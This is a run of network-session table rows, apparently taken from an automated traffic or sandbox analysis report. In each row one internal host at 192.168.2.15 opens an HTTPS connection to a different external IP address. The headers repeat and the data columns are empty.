                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13415192.168.2.1544190121.29.112.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13416192.168.2.154696650.159.65.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13417192.168.2.1555198221.63.108.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13418192.168.2.153960062.104.89.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13419192.168.2.1556026147.212.188.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13420192.168.2.153898070.37.182.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13421192.168.2.1533748198.56.45.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13422192.168.2.1537162144.252.59.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13423192.168.2.1538392103.19.139.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13424192.168.2.1548368195.84.96.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13425192.168.2.155043041.73.0.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13426192.168.2.1537688155.8.97.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13427192.168.2.1538676167.222.163.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13428192.168.2.1536374106.26.166.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13429192.168.2.1548240175.233.211.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13430192.168.2.1540708178.211.141.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13431192.168.2.1552958187.153.190.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13432192.168.2.155622020.12.7.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13433192.168.2.1551674168.91.25.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13434192.168.2.1558248153.112.70.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13435192.168.2.1560510166.101.144.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13436192.168.2.154835482.104.53.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13437192.168.2.1551570181.41.39.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13438192.168.2.1539124121.165.4.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13439192.168.2.1535982178.79.150.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13440192.168.2.1545914163.219.146.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13441192.168.2.1552980163.183.209.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13442192.168.2.1555406190.231.85.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13443192.168.2.15403749.80.138.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13444192.168.2.1546232163.114.112.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13445192.168.2.1541912117.204.87.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13446192.168.2.153736648.127.88.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13447192.168.2.1550834149.18.146.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13448192.168.2.153849249.58.192.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13449192.168.2.153737246.215.146.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13450192.168.2.155220470.160.65.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13451192.168.2.1550276122.189.55.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13452192.168.2.1557702145.210.228.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13453192.168.2.155782486.218.231.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13454192.168.2.154651240.135.35.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13455192.168.2.1538652113.181.181.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13456192.168.2.1539822165.203.24.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13457192.168.2.1554464112.226.15.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13458192.168.2.1548522141.222.146.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13459192.168.2.1547950173.194.100.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13460192.168.2.1552694177.220.191.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13461192.168.2.1552746187.142.134.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13462192.168.2.155120837.241.51.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13463192.168.2.15438202.234.129.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13464192.168.2.1543952148.195.244.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13465192.168.2.1533032204.232.18.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13466192.168.2.1536830123.99.192.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13467192.168.2.1548218178.9.214.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13468192.168.2.154708279.98.117.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13469192.168.2.154774847.211.164.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13470192.168.2.1556528141.169.5.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13471192.168.2.1534192166.43.150.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13472192.168.2.154540632.23.11.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13473192.168.2.1534822150.103.214.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13474192.168.2.154726420.222.255.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13475192.168.2.1541356194.27.100.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13476192.168.2.1542398201.56.59.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13477192.168.2.1550622189.191.12.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13478192.168.2.1560236176.117.78.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13479192.168.2.1557784197.231.48.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13480192.168.2.155805494.134.0.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13481192.168.2.154840697.145.130.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13482192.168.2.1536606190.108.232.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13483192.168.2.153854859.35.12.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13484192.168.2.153300670.35.144.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13485192.168.2.1540922202.113.131.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13486192.168.2.1544686182.170.27.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13487192.168.2.1555562211.238.206.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13488192.168.2.153942672.99.5.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13489192.168.2.1533832213.81.227.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13490192.168.2.1542360144.34.116.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13491192.168.2.154851027.254.5.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13492192.168.2.155231648.199.135.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13493192.168.2.155010266.151.103.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13494192.168.2.155301444.131.116.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13495192.168.2.1544934104.77.149.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13496192.168.2.1560160207.199.91.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13497192.168.2.1538030146.21.81.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13498192.168.2.154544640.146.130.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13499192.168.2.1544014201.103.215.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13500192.168.2.1534596103.171.119.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13501192.168.2.153911850.97.153.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13502192.168.2.153596439.15.222.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13503192.168.2.1552452118.130.181.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13504192.168.2.153669020.23.33.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13505192.168.2.1547852203.147.61.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13506192.168.2.15354204.247.205.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13507192.168.2.15505184.183.248.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13508192.168.2.1559888148.233.150.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13509192.168.2.1540728122.41.184.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13510192.168.2.154348838.74.7.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13511192.168.2.1559190107.183.189.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13512192.168.2.155722241.124.71.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13513192.168.2.1536482178.118.112.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13514192.168.2.1546758117.156.46.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13515192.168.2.1544212117.203.222.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13516192.168.2.1551710166.101.101.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13517192.168.2.155697663.12.192.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13518192.168.2.1535784129.219.122.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13519192.168.2.1560362170.21.85.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13520192.168.2.1544512106.226.47.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13521192.168.2.1542814188.156.216.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13522192.168.2.155316480.185.61.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13523192.168.2.1534278154.194.197.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13524192.168.2.154800817.55.23.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13525192.168.2.154507036.40.76.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13526192.168.2.155874445.33.177.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13527192.168.2.1549070163.226.220.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13528192.168.2.154579443.207.230.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13529192.168.2.154104696.48.156.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13530192.168.2.1557482144.229.162.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13531192.168.2.153392498.221.243.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13532192.168.2.1544122144.104.97.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13533192.168.2.1532912162.57.182.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13534192.168.2.1555338147.181.157.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13535192.168.2.15462849.65.124.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13536192.168.2.154803454.117.109.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13537192.168.2.155573259.53.160.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13538192.168.2.155211685.138.221.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13539192.168.2.155260635.245.132.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13540192.168.2.1536264128.125.201.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13541192.168.2.1560496156.161.171.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13542192.168.2.1560334146.196.37.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13543192.168.2.1552462117.114.150.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13544192.168.2.154098269.11.47.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13545192.168.2.1538822189.3.112.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13546192.168.2.1541064203.255.95.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13547192.168.2.156007843.5.146.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13548192.168.2.15399125.12.231.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13549192.168.2.1558466146.66.40.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13550192.168.2.1544778123.66.228.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13551192.168.2.154563467.226.40.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13552192.168.2.1560728128.41.63.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13553192.168.2.1555276192.35.189.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13554192.168.2.1545170138.155.121.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13555192.168.2.155321496.35.236.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13556192.168.2.1553610158.164.106.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13557192.168.2.1546966150.248.71.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13558192.168.2.1543606146.118.142.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13559192.168.2.154032699.129.240.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13560192.168.2.154380292.121.123.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13561192.168.2.154011466.43.27.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13562192.168.2.154032845.49.103.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13563192.168.2.1548980131.73.42.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13564192.168.2.1555110101.202.60.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13565192.168.2.1538014113.157.4.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13566192.168.2.154580673.238.203.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13567192.168.2.1536604220.109.164.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13568192.168.2.155354454.185.82.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13569192.168.2.1544230212.96.62.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13570192.168.2.1541504134.80.64.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13571192.168.2.153314245.219.206.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13572192.168.2.1558326122.100.220.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13573192.168.2.1544110171.105.158.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13574192.168.2.1560728165.159.102.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13575192.168.2.1558084144.236.200.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13576192.168.2.154693419.43.38.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13577192.168.2.15609504.67.215.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13578192.168.2.1552926109.181.172.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13579192.168.2.1534944107.197.18.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13580192.168.2.154255618.173.164.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13581192.168.2.1537412104.203.242.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13582192.168.2.155858217.249.132.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13583192.168.2.153891499.223.157.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13584192.168.2.154874661.42.109.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13585192.168.2.1548880115.231.52.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13586192.168.2.153902266.239.171.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13587192.168.2.155340252.140.53.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13588192.168.2.1536804111.227.252.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13589192.168.2.155787246.87.158.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13590192.168.2.1556434133.186.223.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13591192.168.2.1543488171.179.5.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13592192.168.2.1550034130.228.83.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13593192.168.2.153640253.199.56.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13594192.168.2.1549864155.184.199.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13595192.168.2.154697072.4.189.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13596192.168.2.1534300111.237.21.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13597192.168.2.1553638118.159.252.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13598192.168.2.1555822139.190.213.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13599192.168.2.1553920176.181.219.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13600192.168.2.1542700140.18.56.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13601192.168.2.1543360196.77.77.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13602192.168.2.1553064161.56.125.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13603192.168.2.1536776161.168.236.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13604192.168.2.1556652169.29.127.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13605192.168.2.155401658.104.102.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13606192.168.2.154929859.181.97.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13607192.168.2.1536600218.31.171.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13608192.168.2.1552230137.100.179.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13609192.168.2.153776651.23.50.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13610192.168.2.1551652190.16.129.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13611192.168.2.1549734164.95.88.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13612192.168.2.1559632201.83.147.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13613192.168.2.1544492161.56.32.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13614192.168.2.1553086121.50.118.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13615192.168.2.153639865.112.102.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13616192.168.2.1548836181.86.110.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13617192.168.2.155767857.161.148.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13618192.168.2.155232096.149.208.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13619192.168.2.1558620197.173.113.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13620192.168.2.154324068.139.88.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13621192.168.2.1540102141.59.41.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13622192.168.2.1560098196.69.67.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13623192.168.2.1550912168.180.154.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13624192.168.2.1537114201.133.56.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13625192.168.2.1539206182.193.81.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13626192.168.2.1533812150.74.121.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13627192.168.2.155431882.18.143.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13628192.168.2.1539954193.244.177.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13629192.168.2.1558560183.169.125.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13630192.168.2.155932814.156.38.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13631192.168.2.153811098.228.103.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13632192.168.2.1541052143.26.115.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13633192.168.2.1538726136.39.12.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13634192.168.2.154917057.119.132.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13635192.168.2.154477286.31.26.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
